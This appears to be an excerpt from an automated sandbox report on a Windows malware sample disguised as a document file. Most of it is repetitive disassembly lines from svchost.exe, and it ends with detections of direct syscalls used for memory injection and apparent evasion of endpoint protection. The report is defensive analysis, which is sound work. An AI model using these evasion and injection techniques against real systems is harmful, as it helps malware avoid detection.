            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]1_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]1_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]1_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]1_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]1_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]1_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]1_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]1_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]1_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]1_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]1_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]1_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]1_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]1_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]1_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]1_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]1_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]1_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]1_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]1_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]1_2_033BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]1_2_033C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6870 mov eax, dword ptr fs:[00000030h]1_2_033C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360854 mov eax, dword ptr fs:[00000030h]1_2_03360854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]1_2_03334859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334859 mov eax, dword ptr fs:[00000030h]1_2_03334859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03342840 mov ecx, dword ptr fs:[00000030h]1_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034008C0 mov eax, dword ptr fs:[00000030h]1_2_034008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC89D mov eax, dword ptr fs:[00000030h]1_2_033BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330887 mov eax, dword ptr fs:[00000030h]1_2_03330887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]1_2_0336C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C8F9 mov eax, dword ptr fs:[00000030h]1_2_0336C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA8E4 mov eax, dword ptr fs:[00000030h]1_2_033FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E8C0 mov eax, dword ptr fs:[00000030h]1_2_0335E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EF28 mov eax, dword ptr fs:[00000030h]1_2_0335EF28
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_0073A937 GetProcessHeap,0_2_0073A937
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00738E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00738E3C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00738E19 SetUnhandledExceptionFilter,0_2_00738E19

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
